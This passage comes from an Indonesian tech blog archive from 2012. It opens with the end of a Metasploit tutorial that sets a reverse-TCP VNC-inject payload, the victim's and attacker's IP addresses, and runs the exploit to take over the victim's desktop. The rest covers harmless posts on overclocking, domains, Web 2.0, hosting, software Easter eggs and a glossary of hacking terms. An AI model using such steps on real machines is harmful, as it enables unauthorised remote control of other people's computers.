ini merupakan mode apa yang akan kita gunakan untuk masuk ke komputer
korban, di sini kita akan menggunakan payload


windows/vncinject/reverse_tcp


setelah dari situ kita set pada msf untuk menggunakan payload tsb dgn perintah
set PAYLOAD windows/vncinject/reverse_tcp


setelah itu kita set ip dari target


set RHOST 192.168.2.87 -----> komputer korba


set LHOST 192.168.2.2 -----> komputer kita


klo udah selesai kita tinggal launch exploit di msf


tinggal ketik


exploit


tunggu setelah selesai, akan muncul jendela desktop dari komputer korban.
kita tinggal remote komputer

Sabtu, 13 Oktober 2012

Core Speed AMD Trinity APU Digenjot Hingga 7,3Ghz

(Foto: Hothardware)

CALIFORNIA - Seri prosesor teranyar keluaran AMD (Advanced Micro Devices), Trinity APU (accelerated processing unit) telah diumumkan beberapa waktu lalu dan menawarkan berbagai keunggulan, termasuk lebih hemat daya ketimbang seri pendahulunya. Para penggiat overclockmelakukan overclocking prosesor tersebut dan mampu mencapai clock Core Speed hingga 7,3GHz.


Dilansir Neowin, Senin (8/10/2012), AMD Trinity APU, seri A10-5800K telah berhasil di-overclockhingga mencapai 7,3GHz dengan menggunakan nitrogen cooling cair. Selain itu, penggiat overclockdari PC Games Hardware juga sukses mendapatkan overclock 5,1GHz menggunakan pendingin udara.


Overclocking A10-5800K menunjukkan angka 7317,74Mhz, meskipun angka ini dicapai dengan penonaktifan dua core dalam APU. Sementara voltase hanya memerlukan 1,956V.


Standar AMD Trinity A10-5800K memiliki empat core yang berjalan antara 3,8GHz dan 4,2GHz. Kecepatan clock tersebut dapat diubah sesuai dengan kebutuhan sistem. Kabarnya, pendingin nitrogen cair tidak akan mungkin mendukung pada mesin rata-rata pengguna komputer, namun pendingin udara yang stabil di 5,1GHz (1,616V), dirasa tepat bagi pengguna yang ingin membeli prosesor kelas menengah (mid-range).


Website Tgdaily menuliskan, bagi para penggiat overclocking atau modifikasi PC, mereka tidak akan menuangkan nitrogen cair pada chip AMD Trinity. Sehingga, dengan capaian clock di 5,1Ghz, merupakan target overclocking yang paling realistis untuk para penggemar teknologi. Jika Anda inginoverclocking APU, pastikan Anda telah menonaktifkan Turbo Mode di BIOS. (fmh)



Jumat, 12 Oktober 2012

Karakteristik Nama Domain yang Bagus

Dalam memilih domain, sebaiknya jangan asal pilih saja. Pertimbangkan dengan matang-matang sebelum membeli domain terutama nama domain. Nama domain adalah aset yang berharga. Sampai-sampai ada usaha jual-beli domain. Awalnya kita membeli puluhan ribu, bisa saja dijual hingga puluhan juta karena keunikannya.




Nama domain dapat menjadi penentu kesuksesan sebuah website/blog. Apalagi jika namanya bagus. Namun, apa saja kriteria bagus tersebut? Berikut adalah 4 karakteristik domain yang bagus.


1. Pendek
Usahakan nama domain sekitar 10 karakter dan tidak lebih dari 20 karakter. Karena nama domain yang unik sekarang ini sangat sulit, kita harus pintar-pintar membuatnya. Atau menggunakan nama sendiri juga boleh. piano.com misalnya. Jika sudah ada yang memiliki, bisa ditambahkan thepiano.com. Kurang dari 10 karakter kan?


2. Mudah diingat
Perhatikan nama piano.com dan thepiano.com tadi. Keduanya nama domain tersebut mudah diingat oleh kita. Jika mudah diingat, tidak menutup kemungkinan pengunjung yang sudah mengunjungi blog kita akan kembali lagi. Itu karena domain kita mudah untuk diingat dan mudah untuk dieja.


3. Memiliki ekstensi.com
Sebenarnya akhiran domain apa saja tidak menjadi masalah. Hanya, domain yang berakhiran .com lebih banyak digunakan oleh banyak orang dan lebih familiar di telinga orang. Asalkan dioptimalkan dengan baik, tidak menjadi masalah.


4. Tidak mengandung angka
Kenapa domain yang mengandung angka itu kurang baik? Karena pengunjung akan menjadi bingung. Misalnya situs yang bernama piano5.com. Dalam penyebutan, otomatis kita menyebutnya pianolima. Nah orang jadi berfikir bahwa situs kita bernama pianolima.com. Padahal piano5. Tapi karena 4shared sudah akrab di telinga orang, jadi situs ini tetap ramai dikunjungi banyak orang.



Gambarnya diambil dari www.wpsite.net

Kamis, 27 September 2012

Pengertian web 2.0 dan ciri-ciri nya

Sudah sejak di gembor-gemborkannya mengani Web 2.0 saya mengenal istilah tersebut, ada beberapa pengertian yang bisa saya ambil secara sederhana, misalnya saja, saya selalu mengidentikan web 2.0 adalah website yang memungkinkan adanya interaksi antara pemilik dan pengguna dengan konsep yang lebih mudah dan fleksible, selain itu ciri dari web 2.0 adalah website yang dibuat dengan full css yang membuat website lebih mudah dan ringan diakses, tidak memakan resources banyak.
Oh tapi sepertinya belum terlalu pas jika saya hanya mengambil pengertian diatas, oleh karenanya saya coba lakukan searching, dan akhirnya menemukan artikel dibawah ini :
n our initial brainstorming, we formulated our sense of Web 2.0 by example:
Web 1.0Web 2.0
DoubleClick–>Google AdSense
Ofoto–>Flickr
Akamai–>BitTorrent
mp3.com–>Napster
Britannica Online–>Wikipedia
personal websites–>blogging
evite–>upcoming.org and EVDB
domain name speculation–>search engine optimization
page views–>cost per click
screen scraping–>web services
publishing–>participation
content management systems–>wikis
directories (taxonomy)–>tagging (“folksonomy”)
stickiness–>syndication
Apa itu web 2.0
Web 2.0. Istilah ini dipakai untuk menggambarkan aplikasi-aplikasi Internet generasi baru yang merevolusi cara kita menggunakan Internet. Semua aplikasi ini membawa kita masuk ke babak baru penggunaan Internet yang berbeda dengan generasi sebelumnya pada pertengahan tahun 1990-an.
What is Web 2.0 karangan Tim O’Reilly menjabarkan arti dan ciri-ciri web 2.0 tersebut. Kebetulan dia merupakan orang yang mencetuskan kata Web 2.0. Ciri -ciri Web 2.0 diantaranya:
1. The Web as Platform
Aplikasi Web 2.0 menggunakan Web (atau Internet) sebagai platformnya. Apa sih yang dimaksud dengan platform ? Platform di sini adalah tempat suatu aplikasi dijalankan. Contoh platform yang terkenal adalah Windows, di mana ada aplikasi-aplikasi seperti Microsoft Office dan Adobe Photoshop. Menggunakan Internet sebagai platform berarti aplikasi-aplikasi tersebut dijalankan langsung di atas Internet dan bukan di atas satu sistem operasi tertentu. Contohnya adalah Google yang bisa diakses dari sistem operasi mana pun. Contoh lainnya adalah Flickr yang juga bisa diakses dari sistem operasi mana pun.
Kelebihannya jelas, aplikasi-aplikasi Web 2.0 ini tidak lagi dibatasi sistem operasi seperti pada Windows. Dan kita bahkan tidak perlu menginstall apapun untuk menggunakan aplikasi-aplikasi ini !
2. Harnessing Collective Intelligence
Aplikasi Web 2.0 memiliki sifat yang unik, yaitu memanfaatkan kepandaian dari banyak orang secara kolektif. Sebagai hasilnya muncullah basis pengetahuan yang sangat besar hasil gabungan dari pengetahuan banyak orang. Contoh yang jelas adalah Wikipedia. Wikipedia adalah ensiklopedi online yang memperbolehkan semua orang untuk membuat dan mengedit artikel. Hasilnya adalah ensiklopedi online besar yang sangat lengkap artikelnya, bahkan lebih lengkap daripada ensiklopedi komersial seperti Encarta ! Contoh lainnya lagi adalah del.icio.us di mana semua orang saling berbagi link-link menarik yang mereka temukan. Akibatnya kita bisa menemukan “permata-permata” di Web gabungan hasil browsing dari ribuan orang. Blogosphere juga merupakan contoh kepandaian kolektif karena setiap orang bisa menulis blog-nya sendiri-sendiri lalu saling link satu sama lain untuk membentuk jaringan pengetahuan, mirip seperti sel-sel otak yang saling terkait satu sama lain di dalam otak kita.
3. Data is the Next Intel Inside
Kekuatan aplikasi Web 2.0 terletak pada data. Aplikasi-aplikasi Internet yang berhasil selalu didukung oleh basis data yang kuat dan unik. Contohnya adalah Google, yang kekuatannya terletak pada pengumpulan dan manajemen data halaman-halaman Web di Internet. Contoh lainnya lagi adalah Amazon yang memiliki data buku yang bukan hanya lengkap, tapi juga sangat kaya dengan hal-hal seperti review, rating pengguna, link ke buku-buku lain, dan sebagainya. Ini berarti perusahaan yang unggul adalah perusahaan yang menguasai data.
4. End of the Software Release Cycle
Aplikasi Web 2.0 memiliki sifat yang berbeda dengan aplikasi pada platform “lama” seperti Windows. Suatu aplikasi Windows biasanya dirilis setiap dua atau tiga tahun sekali, misalnya saja Microsoft Office yang memiliki versi 97, 2000, XP, dan 2003. Di lain pihak, aplikasi Web 2.0 selalu di-update terus-menerus karena sifatnya yang bukan lagi produk melainkan layanan. Google misalnya, selalu di-update data dan programnya tanpa perlu menunggu waktu-waktu tertentu.
5. Lightweight Programming Models
Aplikasi Web 2.0 menggunakan teknik-teknik pemrograman yang “ringan” seperti AJAX dan RSS. Ini memudahkan orang lain untuk memakai ulang layanan suatu aplikasi Web 2.0 guna membentuk layanan baru. Contohnya adalah Google Maps yang dengan mudah dapat digunakan orang lain untuk membentuk layanan baru. Sebagai hasilnya muncullah layanan-layanan seperti HousingMaps yang menggabungkan layanan Google Maps dengan Craigslist. Layanan seperti ini, yang menggabungkan layanan dari aplikasi-aplikasi lainnya, dikenal dengan istilah mashup.
6. Software Above the Level of a Single Device
Aplikasi Web 2.0 bisa berjalan secara terintegrasi melalui berbagai device. Contohnya adalah iTunes dari Apple yang berjalan secara terintegrasi mulai dari server Internet (dalam bentuk toko musik online), ke komputer pengguna (dalam bentuk program iTunes), sampai ke mobile device (dalam bentuk iPod). Di masa depan diperkirakan akan makin banyak aplikasi-aplikasi yang memiliki sifat ini, misalnya saja demo Bill Gates di CES 2006 menunjukkan integrasi antar device yang luar biasa.
7. Rich User Experiences
Aplikasi Web 2.0 memiliki user interface yang kaya meskipun berjalan di dalam browser. Teknologi seperti AJAX memungkinkan aplikasi Internet memiliki waktu respons yang cepat dan user interface yang intuitif mirip seperti aplikasi Windows yang di-install di komputer kita. Contohnya adalah Gmail, aplikasi email dari Google yang memiliki user interface revolusioner. Contoh lainnya lagi adalah Google Maps yang meskipun berjalan dalam browser namun bisa memberikan respons yang cepat saat pengguna menjelajahi peta.
Apakah suatu aplikasi harus memiliki ketujuh ciri-ciri ini untuk bisa disebut “Web 2.0? ? Jawabannya adalah tidak. Namun semakin banyak ciri-ciri yang dimiliki berarti aplikasi itu semakin “Web 2.0? ! Dan satu hal lagi, meskipun contoh-contoh yang diberikan di atas banyak berasal dari keluarga Google, tapi sebenarnya masih banyak aplikasi Web 2.0 yang lain. Di kesempatan lainnya kita akan melihat contoh aplikasi-aplikasi Web 2.0 yang sedang berkembang saat ini.
sumber :
http://oreilly.com/web2/archive/what-is-web-20.html
http://radar.oreilly.com/archives/2005/08/not-20.html
http://www.gayahidupdigital.com/2006/02/16/web-20-1/
http://www.gayahidupdigital.com/2006/02/18/web-20-2/
Be Sociable, Share!

Pengertian Web Hosting ?


Apa Itu Web Hosting ? - Web Hosting adalah salah satu bentuk layanan jasa penyewaan tempat di Internet yang memungkinkan perorangan ataupun organisasi menampilkan layanan jasa atau produknya di web / situs Internet. Tempat dapat juga diartikan sebagai tempat penyimpanan data berupa megabytes (mb) hingga terabytes (tb) yang memiliki koneksi ke internet sehingga data tersebut dapat direquest atau diakses oleh user dari semua tempat secara simultan. Inilah yang menyebabkan sebuah website dapat diakses bersamaan dalam satu waktu oleh multi user.


Pada dasarnya sebuah server web hosting menggunakan adalah sebuah komputer biasa namun menggunakan beberapa komponen dan program dasar sebuah server serta disarankan harus mampu untuk online 24 jam setiap hari dan tanpa harus dimatikan dalam jangka waktu lebih lama daripada komputer biasa


Ada beberapa jenis layanan hosting yaitu shared hosting, VPS atau Virtual Dedicated Server, dedicated server, colocation server.


1. Shared Hosting adalah menggunakan server hosting bersama sama dengan pengguna lain satu server dipergunakan oleh lebih dari satu nama domain. Artinya dalam satu server tersebut terdapat beberapa account yang dibedakan antara account satu dan lainnya dengan username dan password.


2. VPS, Virtual Private Server, atau juga dikenal sebagai Virtual Dedicated Server merupakan proses virtualisasi dari lingkungan software sistem operasi yang dipergunakan oleh server. Karena lingkungan ini merupakan lingkungan virtual, hal tersebut memungkinkan untuk menginstall sistem operasi yang dapat berjalan diatas sistem operasi lain.


3. Dedicated Server adalah penggunaan server yang dikhususkan untuk aplikasi yang lebih besar dan tidak bisa dioperasikan dalam shared hosting atau virtual dedicated server. Dalam hal ini, penyediaan server ditanggung oleh perusahaan hosting yang biasanya bekerja sama dengan vendor.


4. Colocation Server adalah layanan penyewaan tempat untuk meletakkan server yang dipergunakan untuk hosting. Server disediakan oleh pelanggan yang biasanya bekerja sama dengan vendor.


Pengertian Website dan Cara Kerjanya

Pengertian Website secara sederhana dan memahami cara kerja website.




Sebelum belajar cara membuat blog, Kita perlu juga memahami pengertian website dan bagaimana cara kerjanya. Hal ini untuk memudahkan juga dalam proses belajar. Seperti jika kita mau belajar merangkai komputer, akan lebih baik jika kita juga paham bagaimana cara kerja komputer, betul?



Website ada 2 macam dilihat dari fungsi dan kemampuannya berinteraksi dengan pengunjung web. Yaitu website statis, dan website dinamis. Namun di artikel ini kita akan bahas tentang pengertian website saja. 

KEMBALI KE LAPTOP, SECARA SEDERHANANYA SAJA, PENGERTIAN WEBSITE ADALAH KUMPULAN FILE-FILE DALAM SEBUAH FOLDER YANG BERISI BAHASA PEMROGRAMAN (HTML, PHP, CSS, DLL), FILE-FILE GAMBAR, YANG TERSIMPAN DALAM FOLDER-FOLDER, YANG SALING BERKAITAN SATU SAMA LAIN DAN TERTAMPILKAN DALAM BENTUK HALAMAN-HALAMAN. FILE FILE TERSEBUT TERSIMPAN PADA SERVER ONLINE (HOSTING), DAN MEMPUNYAI ALAMAT SPESIFIK (DOMAIN) YANG DIGUNAKAN UNTUK MENGAKSESNYA MELALUI BROWSER.


Kita belum begitu perlu untuk mempelajari HTML, CSS, PHP, dll, karena saat ini membuat website sangat mudah. Kita bisa membuat website gratis menggunakan mesin blog seperti blogspot atau wordpress. Yang paling mudah, lengkap dan paling banyak digunakan adalah wordpress. Ngeblog menggunakan wordpress sangat mudah. Semua menu di halaman admin wordpress mudah dipahami dan sangat mudah dioperasikan bahkan untuk pemula sekalipun.


Lalu bagaimana cara kerja website sehingga bisa ditampilkan di browser? Ngga perlu susah-susah mikir dengan istilah-istilah yang belum kita ngerti, intinya seperti telah disinggung di atas, bisa juga diuraikan seperti ini : 
Kumpulan file dan folder – Website adalah kumpulan file-file yang mengandung bahasa pemrograman, image, dan folder-folder. 
Tersimpan/di upload di server online (hosting) – Kumpulan file-file tersebut di-uplaod/diunggah pada hosting/online server, dan telah mempunyai alamat khusus yang disebut domain. Contoh : www.cara-membuat-blog.info. Untuk lebih jelasnya tentang domain Silahkan baca artikel Pengertian Domain. 
Diakses melalui browser – Kumpulan file-file yang saling berkaitan dan mempunyai alamat khusus/domain tadi bisa dibaca oleh browser sehingga tampil di layar komputer dengan bantuan koneksi internet. 


Berarti untuk membuat sebuah website, kita membutuhkan domain (dot com, dot net, dot org, dll). Dan kita juga harus mempunyai hosting tempat menyimpan file-file website. Kita bisa membeli domain dengan harga sekitar 100rb-an, dan menyewa hosting. Biaya sewa hosting bervariasi sesuai kapasitas, quota bandwith per bulan, dan spesifikasi lainnya. Jika anda ingin domain dan hosting yang murah berkualitas bisa cek di cbwebspace. (Disitu kita bisa sewa hosting per 3 bulan, sangat hemat.)
Nah simple aja kan, itu sudah cukup untuk mengetahui pengertian website dan bagaimana cara kerja website.


Memang untuk membuat website (Blog) akan lebih baik jika kita mengeluarkan sedikit uang untuk membeli domain dan menyewa hosting. Karena mau tidak mau sesuatu yang berbayar dengan yang gratis jelas berbeda dari sisi kualitas, fasilitas, keamanan dan tingkat resikonya. Namun semua kembali ke skala kebutuhan kita dan apa tujuan kita membuat website atau blog.

Jika anda ingin belajar dulu cara membuat blog tanpa mengeluarkan uang, bisa mencoba wordpress versi gratisnya dulu. 

Bisa juga mencoba blogetik, layanan blog lokal berbasis wordpress. Silahkan baca artikelnya : Cara membuat blog gratis di blogdetik.

Untuk melihat dan mengakses semua artikel penting di blog ini anda bisa menuju ke halaman Panduan belajar cara membuat blog.

Jumat, 14 September 2012

The secret behind the program


Easter Eggs are undocumented, hidden tidbits in software, games, etc., that users accidentally stumble upon. These are fun to find, and thousands have already been documented. Easter eggs started out as a rebellion by early programmers who did not get credit for their work. That’s why some of them are as simple as a scrolling list of programmers. However, you also find some as advanced as a hidden car racing game in Excel 2000. So read on to explore the amusing world of Easter eggs.


Windows XP :

Unexpected shutdown:-You will be needing a software called Resource Hacker. Please refer my earlier post how-to-customise-your-start-button to know how to get Resource Hacker. Resource Hacker is a free tool to view and modify 32-bit Windows executables and resource files.

Open the msgina.dll file, located in the C:\Windows\System32 directory, in Resource Hacker. In the left pane, expand Dialog > 2210 > 1033. A dialog box opens at the bottom right hand of the screen. Notice the line just below the drop-down list entitled ‘Why did the computer shut down unexpectedly?!’


Solitare Win Win:-Force Solitare to win by a hack. Here’s how: Open sol.exe located in C:\Windows\System32\ using Resource Hacker. Expand String Table > 64 > 1033 in the left pane. Notice a line in the right pane saying 1010, “Force a win”. Use these numbers to enable the Easter Egg. Now expand Menu > 1 > 1033. Create a menu by typing the following just before the last closing brace:
POPUP “&Easter Egg”
{
MENUITEM "&Egg 1", 1008
MENUITEM "&Egg 2", 1009
MENUITEM "&Egg 3", 1010
}

Now, click the Compile Script button. Next, go to File > Save and save it in the original location, i.e., C:\Windows\System32\sol.exe. Also, replace sol.exe in the C:\Windows\System32\dllcache folder.

Now, a new menu Easter Egg appears with Egg 1, Egg 2 and Egg 3 as options. Click Egg 3 to force a win.


WinRAR:
Works on: WinRAR 3.20, 3.30
Falling Book:-WinRAR—the popular file compression utility—has a smart Easter Egg. Start WinRAR and go to Help > About. Next, click the book icon and it starts to fall. Further, if you press and hold [Shift], and click the logo, you see a small sail boat near the letter ‘R’. You may have to click a few times to see it , though.



Winamp:

Works on: Winamp 2.91:
Full Screen Credits:- Start Winamp, go to Winamp menu, click Nullsoft Winamp and switch to the Credits tab to see an animated screen. Now, hold down [Ctrl] + [Alt] and rightclick twice on the animation. This changes it to full-screen mode and alters the animation a bit. Repeat the same step to get back to normal mode. This full-screen animation depends on the active visualization. Change it to spectrum and then oscilloscope and repeat the process to see the difference.


Works On: Winamp 5:
Full Screen Credits:An animated logo comes up as you go to Winamp menu > Nullsoft Winamp and click the Winamp tab. Press and hold [Shift] and double-click on this logo to change it to an ASCII art.


Dancing Llamas:This is one amusing egg in Winamp 5. First play a song with fast beats and heavy bass. Now, switch to the modern skin and resize the main window. Increase its width to make the Beat Analyzer visible to the left of the Spectrum Analyzer. Now, hold down [Shift] + [Ctrl] + [Alt] and click the centre of the Beat Analyzer. You’ll see two llamas striking their heads on the ground in tune with each beat.


Requires Windows XP or 2000,Winamp5
Transparent Beats:- Play a song that’s akin to the one described above. Now, ensure that the main window has the focus (its title bar should be brighter than that of other windows) and type ‘NULLSOFT’. However, since pressing [L] opens the File Open dialog, you’ll have to press [Esc] after each [L]. Hence, you end up typing [N] [U] [L] [Esc] [L] [Esc] [S] [O] [F] [T]. This done, you see that the main window goes transparent at each beat and then reverts to being opaque. This Easter egg consumes a lot of system resources. If your system runs slow, type NULLSOFT again to turn it off, or just exit Winamp and restart it. In Winamp 2.91, the title bar shows a funny change when you do the same thing. Try this and see yourself.



Windows 98:
Teapot:
Works on: Windows 98, Windows 95

Right-click on the desktop and select Properties. Go to the Screensaver tab and choose the Pipes screensaver. Click Settings and select Pipes as Multiple, Pipe Style as Traditional, Joint Type as Mixed and Surface Style as Solid. Click OK and then click the Preview button. Watch the screensaver churn out teapots instead of joints!

Windows 98 team:
Go to C:\Windows\ ApplicationData\ Microsoft\WELCOME and find the file Weldata.exe. Right-click it and select Create Shortcut. Now, rightclick the shortcut and select Properties. In the General tab, add Y o u _ a r e _ a_real_rascal to the Target text box, after the path, and choose Minimized in the Run combo box. Click OK, doubleclick the shortcut and enjoy!



Windows 98 team:
Version 2
Works on:Windows 98 There is another way to view
Windows 98 team credits. Double-click the clock in the system tray to bring up the Date and Time Properties. Click the Time Zone tab, hold down [Ctrl] and click and hold the mouse button on Cairo, Egypt. With the mouse button still pressed, drag the pointer to Baton Rouge, LA. Release the mouse button but keep [Ctrl] pressed. Click on Baton Rouge, LA again and drag it to Redmond, WA. The credits movie starts to play once you release the mouse button. You can also try doing the same thing in Regional Settings under Control Panel.




to be continued....

Performance Increase Through My Computer


1: Start > Right Click on My Computer and select properties.
2: Click on the "Advanced" tab
3: See the "Perfomance" section? Click "Settings"
4: Disable all or some of the following:

Fade or slide menus into view
Fade or slide ToolTips into view
Fade out menu items after clicking
Show Shadows under menus
Slide open combo boxes
Slide taskbar buttons
Use a background image for each folder type
Use common tasks in folders


There, now Windows will still look nice and perform faster!!!!!!!


Rabu, 05 September 2012

Gita Cherry, Webmaster Google Pertama Dari Indonesia




Mungkin tidak banyak yang mengenal gadis cantik bernama lengkap Gita Cherry Prabhandhari ini. Gita adalah orang pertama dan satu-satunya alias the one and only ! webmaster orang Indonesia yang bekerja di kantor raksasa search engine Google.

Gadis penggemar media digital ini lahir di Indonesia, memperoleh beasiswa pascasarjana melanjutkan kuliahnya di Ritsumeikan Asia Pacific University Jepang. Kini, ia bekerja sebagai Search Quality Associate – Indonesian di markas besar Google di kota Dublin Irlandia. Wow..kereeenn euy..!! Inilah srikandi Indonesia yang mendeklarasikan dirinya sebagai Google spam-fighter !! 

So, buat blogger yang hobi nyepam ini dia nih mata-matanya Google khusus buat ngawasin para spammer di Indonesia. Gita juga adalah orang yang berjasa banyak membantu Kaspar Szymanski (Google Webspam Team) untuk menjawab pertanyaan beruntun dari para blogger Indonesia saat google mengumumkan bahwa “KontesSEO di Indonesia Melanggar TOS Google” pada bulan Maret 2012 kemarin. 

Si manis yang menguasai tiga bahasa: Indonesia, Inggris dan Jepang ini punya spesalisasi di bidang Spam Investigation, Digital Media Planning, Web Analytics, Oral History, Social Research dan Web Building. Kemudian, karena jabatannya sebagai Search Quality Associate – Indonesian, maka Gita memiliki beberapa tugas utama seperti : 

* Peninjauan ulang kualitas dan konten situs 
* Meningkatkan kualitas hasil pencarian Google dengan mengevaluasi website untuk mengidentifikasi bidang yang menjadi perhatian dan kepentingan 
* Bekerja sama dengan tim teknik untuk meningkatkan kualitas pencarian Google 
* Mengembangkan dan berbagi praktek untuk penyelidikan pencarian kualitas dan analisis 
* Memeriksa dan menganalisis isu-isu kualitas pencarian di indeks Google 
* Fokus pada kualitas pencarian Google di Indonesia 

Nah itu dia sobat sedikit profil tentang Gita Cherry Webmaster Google Pertama dari Indonesia. Buat yang ingin mengenal lebih jauh atau ingin berkomunikasi dengan mbak Gita silahkan kunjungi akun google plus Gita Cherry dan masukkan Gita dalam lingkaran anda. Sebagai blogger sepatutnya kita turut bangga karena ternyata diluar sana ada seorang webmaster hebat dari Indonesia.





Sabtu, 18 Agustus 2012

Kamus Hacker, Istilah Hacker


1. Back Orifice: software buatan kelompok hacker ( Cult of the Dead Cow ) yang digunakan sebagai alat bantu untuk menemukan jalan masuk ke sebuah komputer dan mengendalikannya dari jarak jauh (remote). Versi terakhir yang muncul adalah Back Orifice 2000 yang mampu secara virtual mengendalikan sebuah komputer lain dengan sistem operasi Windows. Untuk bisa menggunakannya hacker harus melakukan langkah curang sedemikian rupa sehingga calon korban menerima dan menjalankan Trojan horse (TH) dalam komputernya.TH ini lazimnya diselipkan (attach file lewat email) dalam sebuah file yang tidak berpenampilan jahat namun sebenarnya mengandung program Back Orifice server tersembunyi di balik itu.
Kalau Back Orifice berhasil terinstall di komputer korban maka bisa dipastikan hacker bisa melakukan banyak hal termasuk mengendalikan (kontrol) komputer korban dari jauh. Dari hanya sekedar melihat, menghapus, menambah file sampai merubah tampilan desktop bisa dilakukan hacker pada komputer korbannya.

2. Black hat: kalau anda anggap www itu analogi wild, wild west maka anda tentu sudah bisa menebak tentu black hat ini ada di pihak yang jahat. Hacker black hat ini juga biasa disebut sebagai aka crackers” dengan kemampuan mencuri data atau merusak sistem yang ada dalam komputer korban. Kelebihan black hat adalah kemampuannya untuk menghilangkan jejak hingga tidak bisa dilacak siapa sebenarnya pelaku serangan yang terjadi setelah tujuan tertentu mereka terpenuhi.

3. Buffer overflow: ini adalah sebuah kelemahan yang mudah untuk ditemukan dan dimanfaatkan oleh hacker dalam sebuah sistem. Aplikasi dan Operating System (OS) menyimpan untuk sementara perintah yang mereka dapat di memori tertentu yang biasa disebut buffer memory. Kalau OS atau program tidak bisa dikode secara sempurna maka hacker bisa membuat komputer korban jadi terganggu dengan mengirimkan perintah yang dibuat khusus yang membuat gangguan jadi berlangsung lebih lama. Windows 95 paling rentan kalau sudah berhadapan dengan serangan seperti buffer overflow yang banyak dilancarkan lewat internet ini.
Saat ini serangan serupa sudah jarang dilancarkan pada sebuah komputer. Namun terkadang hacker masih sering melakukannya untuk memperlambat kinerja sebuah situs.

4. Denial-of-service attack : adalah sebuah istilah yang diberikan untuk upaya serangan dengan jalan menurunkan kinerja sebuah web site dengan terus menerus mengulang request ke server dari banyak sumber secara simultan. Serangan seperti ini bertujuan membuat server korban jadi kuwalahan melayani request yang terkirim dan berakhir dengan menghentikan aktivitas atau berhenti dengan sendirinya karena tak mampu melayani request.

5. Distributed denial-of-service attack (DdoS): di masa lalu hacker hanya bisa melancarkan serangan denial-of-service attack dengan mengirimkan request dalam jumlah besar secara simultan dan kontinyu dari sebuah komputer. Namun sekarang hacker bisa mengirimkan serangan dari beberapa komputer yang diaktifkan secara remote. Pada tahun 1998 sebuah kelompok hacker menciptakan program yang memungkinkan seorang hacker mengirimkan sebuah perintah dalam jumlah besar ke komputer korban yang lain agar bisa dikendalikan secara remote. Setelah beberapa komputer korban ada dalam kendalinya, secara bersamaan komputer korban tersebut dikoordinir untuk melancarkan denial-of-service attack kepada korban lain yang menjadi target utama.
Layaknya zombie beberapa komputer yang menjadi korban sebelumnya dikendalikan secara remote untuk melakukan request secara kontinyu dan simultan ke komputer target utama. Serangan serupa DdoS ini sudah
terbukti berhasil melumpuhkan beberapa web server milik situs besar kenamaan seperti Yahoo.com dan eTrade.com. Namun dengan sebuah software pendeteksi dan pengalaman yang cukup admin jaringan di beberapa jaringan besar sudah selayaknya mampu menangkal serangan seperti ini.

6. Exploit: ini merupakan sebuah ungkapan untuk keberadaan sebuah celah keamanan dalam software yang berjalan di sebuah komputer. Lewat exploit inilah peluang untuk melakukan serangan terbuka bagi hacker.
Setiap software atau sistem operasi baru dirilis maka pada saat yang sama genderang perang ditabuh untuk memberi komando pada hacker mulai mencari kelemahannya. Setiap ada kelemahan baru ditemukan oleh para hacker maka pengumuman akan segera tersebar lewat beberapa media yang menjadi forum komuniakasi mereka. Kebanyakan kabar tersebut akan disebarkan di beberapa mailing list seperti CERT, BugTraq, Microsoft’s security bulletins dan beberapa lagi lainnya. Dengan disebarkannya penemuan tersebut pembuat software bisa mengupayakan penangkalnya. Pemakai juga bisa jadi lebih waspada akan terjadinya serangan. Dalam kebanyakan kasus yang terjadi biasanya pemakai software kurang waspada akan kelemahan software yang dipakainya padahal kabar sudah disebar dan penangkal sudah bisa didapat.

7. Firewall: adalah sebuah software program yang dipasang pada sebuah jaringan dan bertugas menjadi penghalang bobolnya akses untuk kepentingan jahat layaknya sebuah saringan. Semua aktivitas keluar dan masuk ke jaringan harus melalui penyaringan ini hingga akses tertentu yang berbahaya bisa dibatasi. Saringan ini juga bisa digunakan untuk mencegah adanya pencurian data berharga dari dalam jaringan oleh pihak lain dari luar jaringan.bisa digunakan untuk mencegah adanya pencurian data berharga dari dalam jaringan oleh pihak lain dari luar jaringan.

8. Hacktivism: adalah aktivitas penyerangan oleh hacker yang dimotivasi oleh simpati tertentu. Hal semacam ini muncul bila aktivis sosial maupun politik menggabungkan kemampuan menyerang yang dimiliki dan menggunakannya untuk kepentingan menarik simpati lebih besar atau unjuk rasa lewat internet.

9. Intrusion detection system (IDS): sama seperti firewall IDS ini merupakan penghambat semua niat jahat yang akan megganggu sebuah jaringan. Bedanya IDS ini lebih mau selangkah dengan kemampuannya memberi peringatan kepada admin server saat terjadi sebuah aktivitas tertentu yang tidak diinginkan admin sebagai penanggung jawab. Selainmemberi peringatan dini IDS juga memberi beberapa alat bantu untuk melacak jenis dan sumber aktivitas terlarang tersebut.

10. Root: istilah ini diadaptasi dari sitem UNIX dimana seorang pengguna bisa memiliki hak pengendalian terbatas pada sebuah sistem. Hacker menggunakan istilah ini untuk menggambarkan kemampuan mereka dalam melancarkan serangan dan menguasai sistem korbannya.

11. Script kiddie: sebuah pola serangan yang sering dilancarkan oleh hacker pemula dengan menggunakan alat bantu ringan yang bisa mereka dapatkan di banyak situs hacker lainnya. Alat bantu yang biasanya berisi sederetan skrip sederhana ini mereka gunakan untuk mendeface atau melancarkan DOS pada korban yang memiliki expolit. Hacker dengan jam terbang yang lebih tinggi biasanya mencibir hacker permula yang menggunakan metode ini karena biasanya mereka hanya menggunakan tanpa tahu teknologi dan konsep yang ada di balik pola serangan yang dilancarkan

12. Trojan horse: adalah sebuah aplikasi yang didesain untuk melakukan sebuah kecurangan namun terselubung dengan kebaikkan. Biasanya metoda yang dipakai adalah dengan menyelipkan (attach file lewat email) sebuah file tertentu yang mengandung trojan horse namun dengan kemasan menarik. Kalau trojan horse berhasil menginfeksi maka bisa dipastikan hacker bisa mendapat akses tak terhingga ke komputer korban. Tiga jenis trojan horse yang popular digunakan adalah Back Orifice, NetBus, dan SubSeven.

13. White hat: hacker dengan kategori ini cenderung lebih memanfaatkan pengetahuan mereka untuk memuaskan rasa ingin tahu bagi intelektualita ketimbang untuk perbuatan jahat yang merusak. Hacker seperti ini sangat nanti dengan perusakan sebuah sistem, pencurian data mauoun merusak kinerja sebuah situs. Namun aktivitas mereka tetap saja menjadi tidak legal bila mereka ingin menguji sebuah sistem milik orang lain yang dimana mereka tidak memiliki otoritas untuk itu. Dalam aktivitasnya tidak jarang mereka melakukan perusakan yang tidak disengaja seperti merubah atau menghapus data yang ada. Kebanyakan hacker seperti ini bekerja secara resmi diperusahaan tertentu sebagai programer, konsultan maupun admin server.

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites